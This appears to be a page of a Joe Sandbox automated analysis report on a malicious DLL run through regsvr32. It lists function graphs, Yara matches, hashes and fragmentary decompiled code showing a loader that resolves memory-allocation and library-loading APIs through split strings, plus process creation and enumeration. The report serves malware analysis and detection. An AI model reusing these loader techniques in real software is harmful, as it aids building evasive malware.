122->126 123->73 124->118 129 9e06c5 124->129 125->89 132 9e06ac 126->132 133 9e06a5-9e06aa 126->133 130 9e066b-9e0674 127->130 128->126 129->118 130->128 130->130 132->114 133->117
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.384877648.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_9e0000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                  • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                  • API String ID: 394283112-3605381585
                                                                                                  • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                  • Instruction ID: b6e53cf5b86ad0bbbb970cc31562bd10e8c04adf062630b49de63bb5cf6c86ba
                                                                                                  • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                  • Instruction Fuzzy Hash: 0E521730618B498BD71ADF19D8857BAB7F0FB94304F14462DE88BC7251DB74E982CB86
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1709C Relevance: 11.5, Strings: 9, Instructions: 237COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                                  • API String ID: 0-383957222
                                                                                                  • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                  • Instruction ID: 0a2479bcbc74cd76bba4b0ead00458f7974802fcca51e4ffa8e139c050d02338
                                                                                                  • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                  • Instruction Fuzzy Hash: E1C1DD71519780AFD388CF28C58A91BBBF0FBD4754F906A1DF882862A0D7B4D949CF02
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180010C10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78librarymemorynativeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                  • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                                  • API String ID: 2485490239-3005932707
                                                                                                  • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                  • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                                  • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                  • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E07D6C Relevance: 7.7, Strings: 6, Instructions: 201COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 260 e07d6c-e07d9a 261 e07d9c-e07da4 260->261 262 e0804a-e080a9 call e1a474 261->262 263 e07daa-e07dad 261->263 273 e080b5 262->273 274 e080ab-e080b0 262->274 265 e07db3-e07db9 263->265 266 e07ff4-e08045 call e16048 263->266 269 e07f53-e07fef call e1fdcc 265->269 270 e07dbf-e07dc5 265->270 266->261 269->261 275 e080ba-e080c0 270->275 276 e07dcb-e07ec1 call e1bb78 270->276 273->275 274->261 277 e07f40-e07f52 275->277 278 e080c6 275->278 281 e07ec6-e07ecc 276->281 278->261 282 e07ece-e07ed5 281->282 283 e07edf-e07f3b call e18f30 281->283 282->283 283->277
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                                  • API String ID: 0-308291206
                                                                                                  • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                  • Instruction ID: de9619a5d3a49ac7ed2ddff751318166f777ec5c945e06ac463f3725cd0ec5ba
                                                                                                  • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                  • Instruction Fuzzy Hash: C7913A7190074A8BDB48CF28D88A4DE3FB1FB58358F65522CEC4AA6290D778D995CFC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1A000 Relevance: 7.7, Strings: 6, Instructions: 154COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 285 e1a000-e1a0cc call e19f38 call e12404 290 e1a0d2-e1a16a call e19424 285->290 291 e1a22c-e1a243 285->291 293 e1a16f-e1a227 call e1c2c0 290->293 293->291
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: /Q$;$F8$KT$F$Z
                                                                                                  • API String ID: 0-1951868783
                                                                                                  • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                  • Instruction ID: 563ee7ee4650cf74338cb07fa4ef2de832ac3da53813dd0267dc11f7e7c685b1
                                                                                                  • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                  • Instruction Fuzzy Hash: FF6135B0E147098FCB48CFA8D88A8DEBBB1FB58314F10821DE856A7290D7749995CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180010AC0 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
				long long _v32;
				long long _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t15;
				long long _t19;
				long long _t20;

				_a24 = _t20;
				_a16 = _t15;
				_a8 = _t19;
				_v56 = _a16;
				if (_v56 == 1) goto 0x80010ae6;
				goto 0x80010bf4;
				 *0x80022ca0 = _a8;
				_v52 = 0x904;
				_v48 = 0xf9e;
				_v40 = 0;
				_v32 = 0;
				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
				ExitProcess(??);
			}











                                                                                                  0x180010ac0
                                                                                                  0x180010ac5
                                                                                                  0x180010ac9
                                                                                                  0x180010ad6
                                                                                                  0x180010adf
                                                                                                  0x180010ae1
                                                                                                  0x180010aeb
                                                                                                  0x180010af2
                                                                                                  0x180010afa
                                                                                                  0x180010b02
                                                                                                  0x180010b0b
                                                                                                  0x180010b1b
                                                                                                  0x180010b22

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                  • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                                  • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                  • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0CC14 Relevance: 4.1, Strings: 3, Instructions: 312COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 309 e0cc14-e0cc36 310 e0cc40 309->310 311 e0cc42-e0cc48 310->311 312 e0cfbb-e0d136 call e2826c call e01718 311->312 313 e0cc4e-e0cc54 311->313 326 e0d138 312->326 327 e0d13d-e0d314 call e01718 call e21ac4 312->327 314 e0cfb1-e0cfb6 313->314 315 e0cc5a-e0cc60 313->315 314->311 318 e0cc66-e0cc73 315->318 319 e0d31f-e0d325 315->319 321 e0ccb0-e0cccb 318->321 322 e0cc75-e0ccae 318->322 319->311 323 e0d32b-e0d338 319->323 325 e0ccd5-e0cf8f call e08870 call e01718 call e21ac4 321->325 322->325 339 e0cf94-e0cf9c 325->339 326->327 327->310 337 e0d31a 327->337 337->319 339->323 340 e0cfa2-e0cfac 339->340
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0c$\$c2&
                                                                                                  • API String ID: 0-1001447681
                                                                                                  • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                  • Instruction ID: 12d05c21780020c91da449286fd61834eaf809783b94149dec656bd1dc5995f1
                                                                                                  • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                  • Instruction Fuzzy Hash: 8902F8711093C88BEBBECF64C8896DE7BADFB44708F10521DEA4A9E298DB745744CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E08BC8 Relevance: 4.0, Strings: 3, Instructions: 213COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 341 e08bc8-e08c26 call e19f38 344 e08c2b-e08c30 341->344 345 e08c36-e08c3b 344->345 346 e08e8a-e08e9a call e02c08 344->346 347 e08c41-e08c43 345->347 348 e08e7b-e08e85 345->348 356 e08ea6 346->356 357 e08e9c-e08ea1 346->357 350 e08eb8-e08f90 call e1c2c0 347->350 351 e08c49-e08c4e 347->351 348->344 361 e08f95-e08fad 350->361 354 e08d71-e08e5f call e152c0 351->354 355 e08c54-e08c59 351->355 366 e08e64-e08e6b 354->366 358 e08d10-e08d6a call e18d60 355->358 359 e08c5f-e08c64 355->359 360 e08ea8-e08ead 356->360 357->344 368 e08d6f Process32FirstW 358->368 359->360 363 e08c6a-e08d0b call e1bf94 359->363 360->361 364 e08eb3 360->364 363->344 364->344 366->361 369 e08e71-e08e76 366->369 368->354 369->344
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .f$M$N5
                                                                                                  • API String ID: 0-1477915503
                                                                                                  • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                  • Instruction ID: 85271a9a26c86974248584b084a67de3d1f629aafe1334be9fd29fc2e4898462
                                                                                                  • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                  • Instruction Fuzzy Hash: 32A194701197449FD7A8DF28C9C959EBBF0FB94304F906A1DF8869B2A0CB74D985CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E18FC8 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 459 e18fc8-e18ff9 call e19f38 462 e19000 459->462 463 e19005-e1900b 462->463 464 e19011-e19017 463->464 465 e19354-e193f0 call e1464c 463->465 467 e19134-e19235 call e1eac0 call e21684 464->467 468 e1901d-e19023 464->468 474 e193f5 465->474 480 e1923a-e1934f call e087dc 467->480 470 e19029-e1902b 468->470 471 e1912a-e1912f 468->471 475 e19031-e19125 call e149b0 470->475 476 e193fa-e19400 470->476 471->463 474->476 475->462 476->463 478 e19406-e19421 476->478 480->474
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: A]jN
                                                                                                  • API String ID: 0-1761522205
                                                                                                  • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                  • Instruction ID: 1076f03cbd1e16a6891d472ed48519b24639b71f194074d393ca8cf68a845b0f
                                                                                                  • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                  • Instruction Fuzzy Hash: 45D1E4B1E0060A8FDF48DFA8C49A4AEBBB1FB58304F11422DD556BB290D7785A46CFD1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0263C Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: C
                                                                                                  • API String ID: 0-3705061908
                                                                                                  • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                  • Instruction ID: 023a5d9a26f4529b0d0faf9e1c8388ddf004ec2b26809c8a273a475d2bd9165d
                                                                                                  • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                  • Instruction Fuzzy Hash: 9761E07151C7848BD768DF28C18A40FBBF1FBD6748F000A1DF69A862A0D7B6D958CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000147C Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 134 18000147c-180001482 135 180001484-180001487 134->135 136 1800014bd-1800014c7 134->136 138 1800014b1-1800014f0 call 180001268 135->138 139 180001489-18000148c 135->139 137 1800015e4-1800015f9 136->137 143 180001608-180001622 call 1800010fc 137->143 144 1800015fb 137->144 157 1800014f6-18000150b call 1800010fc 138->157 158 1800015be 138->158 141 1800014a4 __scrt_dllmain_crt_thread_attach 139->141 142 18000148e-180001491 139->142 146 1800014a9-1800014b0 141->146 148 180001493-18000149c 142->148 149 18000149d-1800014a2 call 1800011ac 142->149 155 180001624-180001659 call 180001224 call 180001e54 call 180001ed0 call 1800013d8 call 1800013fc call 180001254 143->155 156 18000165b-18000168c call 180001c48 143->156 150 1800015fd-180001607 144->150 149->146 155->150 166 18000169d-1800016a3 156->166 167 18000168e-180001694 156->167 169 180001511-180001522 call 18000116c 157->169 170 1800015d6-1800015e3 call 180001c48 157->170 161 1800015c0-1800015d5 158->161 172 1800016a5-1800016af 166->172 173 1800016ea-1800016f2 call 180010ac0 166->173 167->166 171 180001696-180001698 167->171 187 180001573-18000157d call 1800013d8 169->187 188 180001524-180001548 call 180001e94 call 180001e44 call 180001e70 call 180006da0 169->188 170->137 177 18000178b-180001798 171->177 178 1800016b1-1800016b9 172->178 179 1800016bb-1800016c9 172->179 184 1800016f7-180001700 173->184 185 1800016cf-1800016d7 call 18000147c 178->185 179->185 200 180001781-180001789 179->200 190 180001702-180001704 184->190 191 180001738-18000173a 184->191 202 1800016dc-1800016e4 185->202 187->158 209 18000157f-18000158b call 180001e8c 187->209 188->187 234 18000154a-180001551 __scrt_dllmain_after_initialize_c 188->234 190->191 197 180001706-180001728 call 180010ac0 call 1800015e4 190->197 198 180001741-180001756 call 18000147c 191->198 199 18000173c-18000173f 191->199 197->191 229 18000172a-18000172f 197->229 198->200 218 180001758-180001762 198->218 199->198 199->200 200->177 202->173 202->200 220 1800015b1-1800015bc 209->220 221 18000158d-180001597 call 180001340 209->221 224 180001764-18000176b 218->224 225 18000176d-18000177d 218->225 220->161 221->220 233 180001599-1800015a7 221->233 224->200 225->200 229->191 233->220 234->187 235 180001553-180001570 call 180006d5c 234->235 235->187
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0000000118000147C(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x800014bd;
				if (_t5 == 0) goto 0x800014b1;
				if (_t5 == 0) goto 0x800014a4;
				if (__edx == 1) goto 0x8000149d;
				return 1;
			}




                                                                                                  0x180001480
                                                                                                  0x180001482
                                                                                                  0x180001487
                                                                                                  0x18000148c
                                                                                                  0x180001491
                                                                                                  0x18000149c

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                  • String ID:
                                                                                                  • API String ID: 190073905-0
                                                                                                  • Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                  • Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
                                                                                                  • Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                  • Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800063CC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 71%
                                                                                                  			E000000011800063CC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t31;
				intOrPtr _t37;
				void* _t50;
				intOrPtr* _t67;
				long long _t73;
				void* _t75;
				long long _t89;
				signed int _t90;
				void* _t91;
				intOrPtr* _t92;
				void* _t95;
				void* _t98;

				_t98 = __r8;
				_t75 = __rcx;
				_a8 = __rbx;
				r14d = __ecx;
				if (__ecx == 0) goto 0x8000653f;
				_t2 = _t75 - 1; // -1
				if (_t2 - 1 <= 0) goto 0x8000640a;
				E000000011800086F4(_t2 - 1, __rax);
				_t3 = _t90 + 0x16; // 0x16
				 *__rax = _t3;
				E000000011800085B8();
				goto 0x8000653f;
				E00000001180009CD8(_t50, __rbx, _t91);
				r8d = 0x104;
				E000000011800093BC(_t50, 0x80022250, _t75, 0x80022250, _t90, _t91, _t98);
				_t92 =  *0x80022630; // 0xcd3350
				 *0x80022610 = 0x80022250;
				if (_t92 == 0) goto 0x8000643e;
				if ( *_t92 != dil) goto 0x80006441;
				_t67 =  &_a32;
				_a24 = _t90;
				_v56 = _t67;
				r8d = 0;
				_a32 = _t90;
				_t31 = E000000011800061A4(0x80022250, 0x80022250, 0x80022250, 0x80022250, _t95, _t98,  &_a24);
				r8d = 1;
				E0000000118000636C(_t31, _a24, _a32, _t98); // executed
				_t73 = _t67;
				if (_t67 != 0) goto 0x80006499;
				E000000011800086F4(_t67, _t67);
				 *_t67 = 0xc;
				E0000000118000878C(_t67, _a24);
				goto 0x80006403;
				_v56 =  &_a32;
				E000000011800061A4(_t73, 0x80022250, _t73, 0x80022250, _t95, _t67 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x800064d1;
				_t37 = _a24 - 1;
				 *0x80022620 = _t73;
				 *0x80022618 = _t37;
				goto 0x8000653a;
				_a16 = _t90;
				0x80009298();
				if (_t37 == 0) goto 0x80006500;
				E0000000118000878C( &_a32, _a16);
				_a16 = _t90;
				E0000000118000878C( &_a32, _t73);
				goto 0x8000653f;
				_t89 = _a16;
				if ( *_t89 == _t90) goto 0x8000651b;
				if ( *((intOrPtr*)(_t89 + 8)) != _t90) goto 0x8000650f;
				 *0x80022618 = 0;
				_a16 = _t90;
				 *0x80022620 = _t89;
				E0000000118000878C(_t89 + 8, _t90 + 1);
				_a16 = _t90;
				E0000000118000878C(_t89 + 8, _t73);
				return _t37;
			}



















                                                                                                  0x1800063cc
                                                                                                  0x1800063cc
                                                                                                  0x1800063cc
                                                                                                  0x1800063e1
                                                                                                  0x1800063e6
                                                                                                  0x1800063ec
                                                                                                  0x1800063f2
                                                                                                  0x1800063f4
                                                                                                  0x1800063f9
                                                                                                  0x1800063fc
                                                                                                  0x1800063fe
                                                                                                  0x180006405
                                                                                                  0x18000640a
                                                                                                  0x180006416
                                                                                                  0x180006421
                                                                                                  0x180006426
                                                                                                  0x18000642d
                                                                                                  0x180006437
                                                                                                  0x18000643c
                                                                                                  0x180006441
                                                                                                  0x180006445
                                                                                                  0x18000644d
                                                                                                  0x180006452
                                                                                                  0x180006455
                                                                                                  0x18000645e
                                                                                                  0x180006467
                                                                                                  0x180006474
                                                                                                  0x180006479
                                                                                                  0x18000647f
                                                                                                  0x180006481
                                                                                                  0x18000648d
                                                                                                  0x18000648f
                                                                                                  0x180006494
                                                                                                  0x1800064ab
                                                                                                  0x1800064b0
                                                                                                  0x1800064b9
                                                                                                  0x1800064be
                                                                                                  0x1800064c0
                                                                                                  0x1800064c7
                                                                                                  0x1800064cf
                                                                                                  0x1800064d5
                                                                                                  0x1800064dc
                                                                                                  0x1800064e5
                                                                                                  0x1800064eb
                                                                                                  0x1800064f3
                                                                                                  0x1800064f7
                                                                                                  0x1800064fe
                                                                                                  0x180006500
                                                                                                  0x18000650d
                                                                                                  0x180006519
                                                                                                  0x18000651b
                                                                                                  0x180006523
                                                                                                  0x180006527
                                                                                                  0x18000652e
                                                                                                  0x180006536
                                                                                                  0x18000653a
                                                                                                  0x180006551

                                                                                                  APIs
                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00000001800063FE
                                                                                                    • Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
                                                                                                    • Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
                                                                                                  • String ID: C:\Windows\system32\regsvr32.exe
                                                                                                  • API String ID: 2724796048-464481000
                                                                                                  • Opcode ID: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                  • Instruction ID: 22eee0821ddd0031139ae0324638ff7f0a91ab2d69636e8f5a4f0751baae73e2
                                                                                                  • Opcode Fuzzy Hash: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                  • Instruction Fuzzy Hash: C4418B36601B1896FB97DF65A8403EC3795FB4CBC4F588025FE4A43BAADE34C6898340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E13988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 415 e13988-e13a3e call e19f38 418 e13a44-e13ac6 call e0a940 415->418 419 e13acc-e13b12 CreateProcessW 415->419 418->419
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID: li
                                                                                                  • API String ID: 963392458-3170889640
                                                                                                  • Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                  • Instruction ID: d839ad2b4f760bd153dad1667095716b37939a69d97365ea8d2e729e018dee4e
